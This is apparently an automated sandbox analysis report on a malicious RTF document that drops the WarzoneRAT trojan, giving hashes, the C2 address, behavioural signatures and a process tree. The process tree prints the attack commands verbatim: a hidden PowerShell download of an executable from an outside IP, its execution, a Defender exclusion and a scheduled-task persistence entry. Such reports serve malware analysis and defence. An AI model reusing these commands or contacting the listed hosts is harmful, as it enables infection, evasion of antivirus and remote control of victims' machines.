Analysis

  • max time kernel
    113s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    22/09/2022, 07:13

General

  • Target

    Technical sheet.rtf

  • Size

    216KB

  • MD5

    efc5bfa2270790827e34c1aefc4e3693

  • SHA1

    617dbe5c615bf5fdb70f9a4cddec3703252be28a

  • SHA256

    16b057b04ed9bbf2c4d3b60aeb2fc3bba51d0dc5d718aee152e8cbd41a76de29

  • SHA512

    e4c98d13ae1b937cad9a667b9c981a1271011f4d0471e290709e56e473cb2194d1b6e96cb63a9573c2ab555f36ee1a88b94512f212caeaf2e60b123bb6b78180

  • SSDEEP

    1536:9i7ENH5B8eHZbv7bpKsYoItS3xPWpjz+EEFZVzFz76mAg5eeVhMDw5wfLP:9LtRVzFtr5RDAw5wfz

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.230.162.87/news/Helppane.exe

Extracted

Family

warzonerat

C2

20.126.95.155:7800

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Warzone RAT payload 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Technical sheet.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.162.87/news/Helppane.exe','C:\Users\Admin\AppData\Roaming\Helppane.exe')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:668
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\Helppane.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Users\Admin\AppData\Roaming\Helppane.exe
        C:\Users\Admin\AppData\Roaming\Helppane.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1384
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\nygrvVIyUpqPTi.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:772
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nygrvVIyUpqPTi" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE37D.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:1572
        • C:\Users\Admin\AppData\Roaming\Helppane.exe
          "C:\Users\Admin\AppData\Roaming\Helppane.exe"
          4⤵
          • Executes dropped EXE
          PID:1388
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1148

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmpE37D.tmp

      Filesize

      1KB

      MD5

      c6f0511d07ba19e22dbfe72c4472b192

      SHA1

      a62c8fa7ce37c4a284fd1bc628ebc6a13cf46054

      SHA256

      bde216b6e5853a62aed99080eecbb7b55fd0f49989541fc856ec8af2251d7b75

      SHA512

      b626717421b6b0b3d41d906495c75503bf969120f8fb9114ae43f7c16d432c5eefd775db693eb77bfce14d53a1c81ecd5b7a66feb1b8abec95721de12ba73b1f

    • C:\Users\Admin\AppData\Roaming\Helppane.exe

      Filesize

      988KB

      MD5

      0dabd82559d8a8bc397fb053bf73274d

      SHA1

      dabc16a74fc3f9026b19b9631c834848709a59a6

      SHA256

      e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc

      SHA512

      5ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60

    • C:\Users\Admin\AppData\Roaming\Helppane.exe

      Filesize

      988KB

      MD5

      0dabd82559d8a8bc397fb053bf73274d

      SHA1

      dabc16a74fc3f9026b19b9631c834848709a59a6

      SHA256

      e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc

      SHA512

      5ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60

    • C:\Users\Admin\AppData\Roaming\Helppane.exe

      Filesize

      988KB

      MD5

      0dabd82559d8a8bc397fb053bf73274d

      SHA1

      dabc16a74fc3f9026b19b9631c834848709a59a6

      SHA256

      e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc

      SHA512

      5ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      67fc7dbc7aa7b6645e530a8c0a337114

      SHA1

      0854608f3dcb7765772736fcbd63fc0d3a93394b

      SHA256

      bafe9803dce5dfd7d7d8c404248bf1a3c6df4147c85bc8931d2c9257f32bcbe4

      SHA512

      9b624dd9cc17ac44933cf404480ec64e95c5e1315ed6a31b3e78950cb20086abf8d5fb3beea8079c66f52c9cb1b2177f4eb31a48ccc8853911589a8b74c9df1e

    • \Users\Admin\AppData\Roaming\Helppane.exe

      Filesize

      988KB

      MD5

      0dabd82559d8a8bc397fb053bf73274d

      SHA1

      dabc16a74fc3f9026b19b9631c834848709a59a6

      SHA256

      e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc

      SHA512

      5ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60

    • \Users\Admin\AppData\Roaming\Helppane.exe

      Filesize

      988KB

      MD5

      0dabd82559d8a8bc397fb053bf73274d

      SHA1

      dabc16a74fc3f9026b19b9631c834848709a59a6

      SHA256

      e1f1f72698aa8762305e8d324a04608fda13f7a416f2a5a7fcbad843cff138cc

      SHA512

      5ae7dc8614242cfb7d200e93f5629cc4ffebffbdea929ead985fd6d6c331b168767a8ef4ac74fc5c5ca10d7786c0c07196784532ed550393467e84529dc70c60

    • memory/668-61-0x0000000004B60000-0x0000000004C74000-memory.dmp

      Filesize

      1.1MB

    • memory/668-63-0x000000006A780000-0x000000006AD2B000-memory.dmp

      Filesize

      5.7MB

    • memory/668-62-0x000000006A780000-0x000000006AD2B000-memory.dmp

      Filesize

      5.7MB

    • memory/772-100-0x0000000065320000-0x00000000658CB000-memory.dmp

      Filesize

      5.7MB

    • memory/1148-75-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

      Filesize

      8KB

    • memory/1384-76-0x0000000000520000-0x000000000052C000-memory.dmp

      Filesize

      48KB

    • memory/1384-77-0x0000000005480000-0x00000000054FC000-memory.dmp

      Filesize

      496KB

    • memory/1384-72-0x00000000004D0000-0x00000000004E4000-memory.dmp

      Filesize

      80KB

    • memory/1384-70-0x0000000000990000-0x0000000000A8E000-memory.dmp

      Filesize

      1016KB

    • memory/1384-83-0x0000000004DE0000-0x0000000004E02000-memory.dmp

      Filesize

      136KB

    • memory/1388-93-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-101-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-99-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-94-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-92-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-84-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-85-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-87-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-89-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1388-90-0x0000000000400000-0x0000000000554000-memory.dmp

      Filesize

      1.3MB

    • memory/1736-54-0x0000000072261000-0x0000000072264000-memory.dmp

      Filesize

      12KB

    • memory/1736-73-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/1736-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1736-57-0x0000000075DA1000-0x0000000075DA3000-memory.dmp

      Filesize

      8KB

    • memory/1736-58-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/1736-55-0x000000006FCE1000-0x000000006FCE3000-memory.dmp

      Filesize

      8KB

    • memory/1736-102-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1736-103-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB